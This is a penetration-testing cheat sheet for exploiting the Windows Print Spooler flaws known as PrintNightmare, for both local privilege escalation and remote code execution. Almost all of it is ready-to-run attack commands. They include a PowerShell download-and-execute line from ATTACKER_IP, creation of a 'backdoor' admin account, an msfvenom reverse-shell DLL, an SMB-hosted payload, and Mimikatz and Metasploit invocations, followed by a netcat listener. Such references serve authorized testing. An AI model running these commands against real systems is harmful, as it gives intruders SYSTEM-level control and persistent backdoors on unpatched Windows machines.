Skip to main content

Overview

PrintNightmare exploits the Windows Print Spooler service to achieve LPE (Local Privilege Escalation) or RCE (Remote Code Execution) by loading a malicious DLL as SYSTEM.
CVETypeImpact
CVE-2021-1675LPELocal user → SYSTEM
CVE-2021-34527RCERemote code execution as SYSTEM

Check if Vulnerable

Print Spooler running:
sc query spooler
Get-Service -Name Spooler
Missing patch:
wmic qfe | findstr "KB5003690 KB5003695 KB5003697"
If no results → vulnerable.

Local Privilege Escalation (LPE)

Using PowerShell (CVE-2021-1675)

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "backdoor" -NewPassword "P@ssw0rd123!" -DriverName "PrintIt"
Verifies by adding local admin. Then:
net localgroup administrators
runas /user:backdoor cmd

GitHub

https://github.com/calebstewart/CVE-2021-1675

Remote Code Execution (RCE)

Step 1 — Create Malicious DLL

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

Step 2 — Host DLL on SMB Share

impacket-smbserver share . -smb2support

Step 3 — Exploit

# cube0x0's exploit
python3 CVE-2021-1675.py DOMAIN/user:password@TARGET '\\ATTACKER_IP\share\evil.dll'
# Using impacket
https://github.com/cube0x0/CVE-2021-1675

Step 4 — Catch Shell

nc -lvnp 4444

Via Mimikatz

misc::printnightmare /library:\\ATTACKER_IP\share\evil.dll /server:TARGET
Local:
misc::printnightmare /library:C:\Temp\evil.dll

Metasploit

use exploit/windows/dcerpc/CVE_2021_1675_printnightmare
set RHOSTS TARGET
set SMBUser user
set SMBPass password
set SRVHOST ATTACKER_IP
run

Post-Exploitation Cleanup

# Remove added driver (/dd deletes a driver by model; /dl /n only deletes a printer device)
rundll32 printui.dll,PrintUIEntry /dd /m "PrintIt" /q
PrintNightmare can crash the Print Spooler service. In a real engagement, coordinate with the client before exploiting.